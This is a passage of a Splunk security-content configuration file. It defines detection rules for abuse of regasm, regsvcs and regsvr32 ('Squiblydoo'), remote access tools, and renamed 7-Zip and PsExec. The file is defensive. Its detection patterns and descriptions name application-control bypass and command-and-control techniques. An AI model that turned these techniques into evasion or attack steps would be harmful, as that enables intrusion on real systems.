process="(?i)(regasm\.exe.{0,4}$)" | `detect_regasm_with_no_command_line_arguments_filter` [ESCU - Detect Regsvcs Spawning a Process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, limited instances of regasm.exe or regsvcs.exe may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Regsvcs Spawning a Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ typically not normal for this process. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Regsvcs Spawning a Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.notable.param.rule_title = Detect Regsvcs Spawning a Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regsvcs.exe by Processes.parent_process_name Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_spawning_a_process_filter` [ESCU - Detect Regsvcs with Network Connection - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies Regsvcs.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies Regsvcs.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Although unlikely, limited instances of regsvcs.exe may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage. action.escu.creation_date = 2024-01-30 action.escu.modification_date = 2024-01-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Regsvcs with Network Connection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ contacting a remote destination was identified on endpoint $dest$ by user $user$. This behavior is not normal for $process_name$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Regsvcs with Network Connection - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies Regsvcs.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.notable.param.rule_title = Detect Regsvcs with Network Connection action.notable.param.security_domain = Endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=3 dest_ip!=10.0.0.0/8 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regsvcs.exe | stats count min(_time) as firstTime max(_time) as lastTime by dest, user, process_name, src_ip, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_with_network_connection_filter` [ESCU - Detect Regsvcs with No Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, limited instances of regsvcs.exe may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage. action.escu.creation_date = 2022-03-15 action.escu.modification_date = 2022-03-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Regsvcs with No Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Regsvcs with No Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.notable.param.rule_title = Detect Regsvcs with No Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regsvcs` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(regsvcs\.exe.{0,4}$)"| `detect_regsvcs_with_no_command_line_arguments_filter` [ESCU - Detect Regsvr32 Application Control Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.This variation of the technique is often referred to as a "Squiblydoo" attack. \ Upon investigating, look for network connections to remote destinations (internal or external). Be cautious to modify the query to look for "scrobj.dll", the ".dll" is not required to load scrobj. "scrobj.dll" will be loaded by "regsvr32.exe" upon execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.This variation of the technique is often referred to as a "Squiblydoo" attack. \ Upon investigating, look for network connections to remote destinations (internal or external). Be cautious to modify the query to look for "scrobj.dll", the ".dll" is not required to load scrobj. "scrobj.dll" will be loaded by "regsvr32.exe" upon execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives related to third party software registering .DLL's. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Regsvr32 Application Control Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack", "Suspicious Regsvr32 Activity"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ in an attempt to bypass detection and preventative controls was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Regsvr32 Application Control Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack", "Suspicious Regsvr32 Activity"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.This variation of the technique is often referred to as a "Squiblydoo" attack. \ Upon investigating, look for network connections to remote destinations (internal or external). Be cautious to modify the query to look for "scrobj.dll", the ".dll" is not required to load scrobj. "scrobj.dll" will be loaded by "regsvr32.exe" upon execution. action.notable.param.rule_title = Detect Regsvr32 Application Control Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process=*scrobj* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_regsvr32_application_control_bypass_filter` [ESCU - Detect Remote Access Software Usage File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects when a file from a known remote access software is written to disk within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects when a file from a known remote access software is written to disk within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the file path, file name, and the user that created the file. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Filesystem` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Known or approved applications used by the organization or usage of built-in functions. action.escu.creation_date = 2024-02-22 action.escu.modification_date = 2024-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Remote Access Software Usage File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Insider Threat", "Command And Control", "Ransomware"] action.risk = 1 action.risk.param._risk_message = A file for known a remote access software [$file_name$] was created on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Remote Access Software Usage File - Rule action.correlationsearch.annotations = {"analytic_story": ["Insider Threat", "Command And Control", "Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count, min(_time) as firstTime, max(_time) as lastTime, values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.dest, Filesystem.user, Filesystem.file_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Filesystem)` | lookup remote_access_software remote_utility AS file_name OUTPUT isutility, description as signature, comment_reference as desc, category | search isutility = TRUE | `detect_remote_access_software_usage_file_filter` [ESCU - Detect Remote Access Software Usage FileInfo - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects when process with file or code signing attributes from a known remote access software is executed with the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects when process with file or code signing attributes from a known remote access software is executed with the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.how_to_implement = This analytic relies on Sysmon to be properly installed and utilized in the environment. Ensure that proper logging is setup for Sysmon and data is being ingested into Splunk. action.escu.known_false_positives = Known or approved applications used by the organization or usage of built-in functions. action.escu.creation_date = 2024-02-22 action.escu.modification_date = 2024-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Remote Access Software Usage FileInfo - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Insider Threat", "Command And Control", "Ransomware"] action.risk = 1 action.risk.param._risk_message = A file attributes for known a remote access software [$process_name$] was detected on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Remote Access Software Usage FileInfo - Rule action.correlationsearch.annotations = {"analytic_story": ["Insider Threat", "Command And Control", "Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=1 | stats count min(_time) as firstTime max(_time) as lastTime, values(Company) as Company values(Product) as Product by dest, user, parent_process_name, process_name, process | lookup remote_access_software remote_utility_fileinfo AS Product OUTPUT isutility, description as signature, comment_reference as desc, category | search isutility = True | `detect_remote_access_software_usage_fileinfo_filter` [ESCU - Detect Remote Access Software Usage Process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects when a known remote access software is executed within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects when a known remote access software is executed within the environment. Adversaries use these utilities to retain remote access capabilities to the environment. Utilities in the lookup include AnyDesk, GoToMyPC, LogMeIn, TeamViewer and much more. Review the lookup for the entire list and add any others. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is possible that legitimate remote access software is used within the environment. Ensure that the lookup is reviewed and updated with any additional remote access software that is used within the environment. action.escu.creation_date = 2024-02-22 action.escu.modification_date = 2024-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Remote Access Software Usage Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Insider Threat", "Command And Control", "Ransomware"] action.risk = 1 action.risk.param._risk_message = A process for a known remote access software $process_name$ was identified on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Remote Access Software Usage Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Insider Threat", "Command And Control", "Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1219"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.parent_process) as parent_process from datamodel=Endpoint.Processes where Processes.dest!=unknown Processes.process!=unknown by Processes.dest Processes.user Processes.process_name Processes.process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | lookup remote_access_software remote_utility AS process_name OUTPUT isutility, description as signature, comment_reference as desc, category | search isutility = True | `detect_remote_access_software_usage_process_filter` [ESCU - Detect Renamed 7-Zip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies renamed 7-Zip usage using Sysmon. At this stage of an attack, review parallel processes and file modifications for data that is staged or potentially have been exfiltrated. This analytic utilizes the OriginalFileName to capture the renamed process. During triage, validate this is the legitimate version of `7zip` by reviewing the PE metadata. In addition, review parallel processes for further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies renamed 7-Zip usage using Sysmon. At this stage of an attack, review parallel processes and file modifications for data that is staged or potentially have been exfiltrated. This analytic utilizes the OriginalFileName to capture the renamed process. During triage, validate this is the legitimate version of `7zip` by reviewing the PE metadata. In addition, review parallel processes for further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives, however this analytic will need to be modified for each environment if Sysmon is not used. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Renamed 7-Zip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Collection and Staging"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Renamed 7-Zip - Rule action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging"], "cis20": ["CIS 10"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.original_file_name=7z*.exe AND Processes.process_name!=7z*.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_renamed_7_zip_filter` [ESCU - Detect Renamed PSExec - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies renamed instances of `PsExec.exe` being utilized on an endpoint. Most instances, it is highly probable to capture `Psexec.exe` or other SysInternal utility usage with the command-line argument of `-accepteula`. During triage, validate this is the legitimate version of `PsExec` by reviewing the PE metadata. In addition, review parallel processes for further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies 